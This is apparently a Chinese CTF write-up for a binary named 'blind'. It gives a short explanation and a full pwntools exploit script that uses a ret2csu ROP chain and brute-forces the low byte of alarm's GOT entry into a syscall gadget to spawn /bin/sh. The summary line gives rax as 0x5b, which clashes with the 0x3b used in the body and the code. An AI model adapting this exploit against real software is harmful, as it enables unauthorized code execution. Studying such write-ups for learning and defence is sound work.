本文介绍了一种利用ret2csu技术来覆盖alarm的全局偏移表(GOT)的方法,并通过爆破手段将alarm指向系统调用,最终通过read函数设置rax寄存器值为0x5b,从而执行execve(/bin/sh0,0)获得shell。文章提供了一个Python编写的exp脚本实例。
利用ret2csu,覆盖alarm的got表最低一字节,通过爆破劫持alarm为syscall。
通过read函数的返回值让rax为0x5b,执行execve("/bin/sh", 0, 0)
exp
#/usr/env/bin python
from pwn import *
import time
context.log_level = "debug"
gadget1 = 0x4007ba
gadget2 = 0x4007a0
elf = ELF('./blind')
read_got = elf.got['read']
read_plt = elf.plt['read']
alarm_plt = elf.plt['alarm']
alarm_got = elf.got['alarm']
bss_addr = elf.bss()
i = 1
def exp(off):
payload = 'a' * 0x58
payload += p64(gadget1)
payload += p64(0) + p64(1) + p64(read_got)
payload += p64(1) + p64(alarm_got) + p64(0)
payload += p64(gadget2)
payload += p64(gadget1)
payload += p64(0) + p64(1) + p64(read_got)
payload += p64(0x3b) + p64(bss_addr) + p64(0)
payload += p64(gadget2)
payload += p64(gadget1)
payload += p64(0) + p64(1) + p64(alarm_got)
payload += p64(0) + p64(0) + p64(bss_addr)
payload += p64(gadget2)
payload = payload.ljust(0x500, '\x00')
payload += p8(off)
payload += "/bin/sh\x00" + 'a' * (0x3b - 8)
#gdb.attach(r)
#pause()
r.send(payload)
sleep(1)
r.sendline("echo hello!")
s = r.recv(10)
print s
if "hello" in s:
r.sendline("ls")
r.sendline("cat flag")
r.interactive()
else:
return
i = 20
while True:
try:
global r
r = process("./blind")
i += 1
exp(i)
print i
except:
r.close()
print 'trying...'
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
